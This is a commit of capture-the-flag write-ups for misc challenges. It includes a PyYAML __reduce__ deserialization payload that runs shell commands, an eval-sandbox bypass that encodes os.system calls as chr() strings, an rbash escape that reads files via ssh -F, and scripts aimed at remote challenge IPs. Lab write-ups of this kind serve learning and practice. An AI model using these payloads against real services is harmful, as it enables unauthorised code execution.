docs: Add misc writeups

Author: sbencoding

misc/hijack.md

@@ -0,0 +1,44 @@
+# Hijack (easy)
+This challenge will use python YML deserialization.
+
+When connecting to the remote we can generate a config load a config or exit
+
+When we generate a config we get a base64 string
+```
+ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcxMCcsIGF1dG9fY2FsaWJyYXRpb246ICdPTicsCiAgcHJvcHVsc2lvbl90ZW1wOiAnMTAnLCBzb2xhcl9hcnJheV90ZW1wOiAnMTAnLCB1bml0czogRn0K
+```
+
+When decoded:
+```
+!!python/object:__main__.Config {IR_spectrometer_temp: '10', auto_calibration: 'ON',
+  propulsion_temp: '10', solar_array_temp: '10', units: F}
+```
+
+First I noted that this is a python service running on the remote.
+After looking for a similar structured string online I found out that this is what YML serialization looked like
+
+Next I had looked at how this can be exploited.
+It seems that there are 2 types of load functions:
+* `safe_load` - will not deserialize class objects
+* `load` - will deserialize class objects
+
+I tried my luck with hoping that it will use unsafe deseralization, and it was
+
+```python
+# https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization
+# HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}
+import yaml
+import base64
+from yaml import UnsafeLoader, FullLoader, Loader
+import subprocess
+import os
+
+class Payload(object):
+    def __reduce__(self):
+        return (os.system,('cat flag.txt',))
+
+deserialized_data = yaml.dump(Payload()) # serializing data
+print(base64.b64encode(deserialized_data))
+```
+
+Before the final version I have submitted some other commands to find out where the flag is on the system.

misc/janken.md

@@ -0,0 +1,87 @@
+# Janken (easy)
+For this challenge we get a binary that will be running on the remote.
+
+First I check the rules of the game, and it seems like a rock, paper, scissors game.
+When playing we can type rock, paper, scissors, the opponent will guess as well and we need to win 100 times.
+Let's see how the game is implemented in ghidra
+
+```c
+  for (; rounds < 100; rounds = rounds + 1) {
+    fprintf(stdout,"\n[*] Round [%d]:\n",rounds);
+    game();
+  }
+```
+
+In main we see that the `game` function is called 100 times, let's see what the `game` function does.
+
+```c
+  tVar2 = time((time_t *)0x0);
+  srand((uint)tVar2);
+  iVar1 = rand();
+  local_78[0] = "rock";
+  local_78[1] = "scissors";
+  local_78[2] = "paper";
+  local_38 = 0;
+  local_30 = 0;
+  local_28 = 0;
+  local_20 = 0;
+  local_58[0] = "paper";
+  local_58[1] = "rock";
+  local_58[2] = "scissors";
+  fwrite(&DAT_00102540,1,0x33,stdout);
+  read(0,&local_38,0x1f);
+  fprintf(stdout,"\n[!] Guru\'s choice: %s%s%s\n[!] Your  choice: %s%s%s",&DAT_00102083,
+          local_78[iVar1 % 3],&DAT_00102008,&DAT_0010207b,&local_38,&DAT_00102008);
+  local_88 = 0;
+  do {
+    sVar4 = strlen((char *)&local_38);
+    if (sVar4 <= local_88) {
+LAB_001017a2:
+      pcVar5 = strstr((char *)&local_38,local_58[iVar1 % 3]);
+      if (pcVar5 == (char *)0x0) {
+        fprintf(stdout,"%s\n[-] You lost the game..\n\n",&DAT_00102083);
+                    /* WARNING: Subroutine does not return */
+        exit(0x16);
+      }
+      fprintf(stdout,"\n%s[+] You won this round! Congrats!\n%s",&DAT_0010207b,&DAT_00102008);
+      if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+                    /* WARNING: Subroutine does not return */
+        __stack_chk_fail();
+      }
+      return;
+    }
+    ppuVar3 = __ctype_b_loc();
+    if (((*ppuVar3)[*(char *)((long)&local_38 + local_88)] & 0x2000) != 0) {
+      *(undefined *)((long)&local_38 + local_88) = 0;
+      goto LAB_001017a2;
+    }
+    local_88 = local_88 + 1;
+  } while( true );
+```
+
+First our input is read, and the opponent chooses a random move.
+`local_78` is the array of moves for the opponent.
+At matching indices `local_58` contains the winning moves that we need to make, important to note how a draw counts as a lose for some reason.
+
+But look at what function is used! `strstr` looks for the second argument in the first argument, and returns the index of the first occurrence or NULL if not found.
+
+Now notice how when reading user input 0x1f bytes are read.
+
+We can just send `rockpaperscissors` on each choice and it would surely contain the winning move!
+
+```python
+from pwn import *
+p = remote('165.227.224.40', 30509)
+
+payload = 'rockpaperscissors'
+p.sendlineafter(b'>>', b'1')
+
+for i in range(99):
+    p.sendlineafter(b'>>', b'rockpaperscissors')
+    print(f'sent {i}')
+p.interactive()
+```
+
+For some reason there was an issue with sending this 100 times, so I decreased the count to 99
+
+After this the opponent gives us the flag.

misc/nehebkaus_trap.md

@@ -0,0 +1,27 @@
+# Nehebkaus trap (medium)
+For this challenge the remote allows us to send input.
+
+After some trial and error I sent
+`print(1)` and I got back 1 as the result. This seems like python evaluates whatever we input
+
+Let's try `print('test')`!
+Oh, this contains a blacklisted character :(
+
+But parentheses work! We can construct any string we want by doing `chr(<ascii code>)+...+chr(<ascii code>)`
+And luckily the `+` is also allowed.
+
+Now all that is left to do is to encode our payload with the following method to get the flag:
+
+```python
+def obf(inp):
+    ans = []
+    for c in inp:
+        ans.append(f'chr({ord(c)})')
+    return '+'.join(ans)
+
+shell_cmd = 'cat flag.txt'
+eval_content = f'__import__("os").system("{shell_cmd}")'
+command = f'print(eval({obf(eval_content)}))'
+
+print(command)
+```

misc/persistence.md

@@ -0,0 +1,9 @@
+# Persistence (very easy)
+This challenge asks us to send around 1000 request to a `/flag` endpoint.
+
+```python
+import requests
+for i in range(0, 2000):
+    resp = requests.get('http://165.232.108.36:30519/flag')
+    if b'HTB' in resp.content: print(resp.content)
+```

misc/remote_computation.md

@@ -0,0 +1,62 @@
+# Remote computation (easy)
+In this challenge we will need to perform some computation coming from a remote
+
+First let's read through the **help** menu
+
+```
+Results
+---
+All results are rounded
+to 2 digits after the point.
+ex. 9.5752 -> 9.58
+
+Error Codes
+---
+* Divide by 0:
+This may be alien technology,
+but dividing by zero is still an error!
+Expected response: DIV0_ERR
+
+* Syntax Error
+Invalid expressions due syntax errors.
+ex. 3 +* 4 = ?
+Expected response: SYNTAX_ERR
+
+* Memory Error
+The remote machine is blazingly fast,
+but its architecture cannot represent any result
+outside the range -1337.00 <= RESULT <= 1337.00
+Expected response: MEM_ERR
+```
+
+So now we know something about rounding and the types of errors we should have.
+
+I will shamelessly pass all the input to `eval` in python.
+It would have been funny if they sent an RCE :)
+
+The errors are pretty much already covered by python and the calculation logic is obviously implemented.
+
+```python
+from pwn import *
+p = remote('165.227.224.40', 30418)
+
+p.sendlineafter(b'>', b'1')
+
+for i in range(0, 500):
+    req = p.recvuntil(b'=')
+    eq = req.split(b': ')[1][:-2]
+    print(eq)
+    ans = None
+    try:
+        ans = round(eval(eq), 2)
+        if ans < -1337.00 or ans > 1337.00: ans = 'MEM_ERR'
+        else: ans = str(ans)
+    except ZeroDivisionError:
+        ans = 'DIV0_ERR'
+    except SyntaxError:
+        ans = 'SYNTAX_ERR'
+
+    print(f' -- {ans}')
+    p.sendlineafter(b'>', bytes(ans, 'utf-8'))
+p.interactive()
+```

misc/restricted.md

@@ -0,0 +1,31 @@
+# Restricted (easy)
+In this challenge we will try to bypass a restricted bash shell
+
+From the `Dockerfile` we see that a restricted environment is set up.
+* Our user will be the **restricted** user
+* As shell we will have `rbash`
+* We will have access to 3 executables: `top`, `uptime` and `ssh`
+* Our path is restricted to the `.bin` folder in our home directory
+
+Reading the ssh configuration I found the following line:
+```
+Match user restricted
+    PermitEmptyPasswords yes
+```
+
+Okay so we can log in using the **restricted** user through ssh.
+
+Once on the system it seems that we can't do anything.
+This is a good time to go to [GTFO bins](https://gtfobins.github.io/) to see if there is any way to escape our restricted environment.
+
+`top` and `uptime` don't seem helpful, however `ssh` seems promising.
+
+I went to the file read section, which suggested a way to read files outside of the restricted environment.
+
+From the docker file we already know the flag is in `/flag<random>`, so we use the following command on the remote:
+
+```
+ssh -F /flag* localhost -p 1337
+```
+
+This will read us the flag :)

misc/the_chasms_crossing_conondrum.md

@@ -0,0 +1,96 @@
+# The chasm's crossing conundrum (hard)
+First I get the instructions of the game
+
+```
+☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠
+☠                                                                             ☠️
+☠  [*] The path ahead is treacherous.                                         ☠️
+☠  [*] You have to find a viable strategy to get everyone across safely.      ☠️
+☠  [*] The bridge can hold a maximum of two persons.                          ☠️
+☠  [*] The chasm lurks on either side of the bridge waiting for those         ☠️
+☠      who think they can get across in total darkness.                       ☠️
+☠  [*] If two persons get across, one must come back with the flashlight.     ☠️
+☠  [*] The flashlight has energy only for a limited amount of time.           ☠️
+☠  [*] The time required for two persons to cross, is dictated by the slower. ☠️
+☠  [*] The answer must be given in crossing and returning pairs. For example, ☠️
+☠      [1,2],[2],... . This means that persons 1 and 2 cross and 2 gets back  ☠️
+☠       with the flashlight so others can cross.                              ☠️
+☠                                                                             ☠️
+☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠
+```
+
+Basically:
+* cross a bridge
+* only one flashlight is available which is limited
+* flashlight is required to cross
+* at most 2 people can cross
+* each person has a different time to cross
+* the crossing speed is that of the slowest person on the bridge
+
+First I have thought that a greedy solution would be good for this challenge.
+This would mean that I find the fastest person and then always send from one side the fastest person and someone, and then only the fastest person on the way back.
+
+After trying and failing a couple of times I started to question whether this was truly the best approach.
+
+I had a slight intuition that we could send the 2 slowest people across, because that would essentially delete the time penalty of the second slowest person, whereas with my approach we always take the time penalty of every person.
+
+The basic 4 person version of this problem is quite popular as internet browsing suggests.
+
+1. Send 2 fastest
+2. Send fastest back
+3. Send 2 slowest
+4. Send 2nd fastest back
+5. Make 2 fastest cross together
+6. win
+
+However extending this to multiple people, or having an algorithm to give the ordering of people and not just the shortest time was not so popular anymore.
+
+Still I have tried going with this approach and hard coding sending some fastest and slowest pairs.
+
+In the end my algorithm doesn't always produce the perfect solution, however for some instance of the problem it does, and that resulted in the flag.
+
+```python
+# algorithm incorrect, but works some of the time
+# greedy not a good solution
+# known solution is DP but without who crosses when, only the min cross time
+# solution wants optimal cross time
+ppl = {
+    1: 66,
+    2: 43,
+    3: 33,
+    4: 1,
+    5: 62,
+    6: 17,
+    7: 68,
+    8: 40,
+}
+
+battery = 232
+
+ppl_sorted = {k: v for k, v in sorted(ppl.items(), key=lambda item: item[1])}
+print(ppl_sorted)
+ppl_sorted = list(ppl_sorted.items())
+
+ans = []
+ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[1][0]}]')
+ans.append(f'[{ppl_sorted[0][0]}]')
+ans.append(f'[{ppl_sorted[-1][0]},{ppl_sorted[-2][0]}]')
+ans.append(f'[{ppl_sorted[1][0]}]')
+ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[1][0]}]')
+ans.append(f'[{ppl_sorted[0][0]}]')
+ans.append(f'[{ppl_sorted[-3][0]},{ppl_sorted[-4][0]}]')
+ans.append(f'[{ppl_sorted[1][0]}]')
+
+cost = (ppl_sorted[1][1] * 2 + ppl_sorted[0][1]) * 2 + ppl_sorted[-1][1] + ppl_sorted[-3][1]
+for i in range(1, len(ppl)-4):
+    ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[i][0]}]')
+    cost += ppl_sorted[i][1]
+    if i != len(ppl) - 5:
+        ans.append(f'[{ppl_sorted[0][0]}]')
+        cost += ppl_sorted[0][1]
+
+print(','.join(ans))
+print(cost)
+```
+
+I print the `cost` which is the time spent so that I can immediately see if a solution will be accepted by the remote. I never made a script that does this automatically instead I just copied the input values by hand.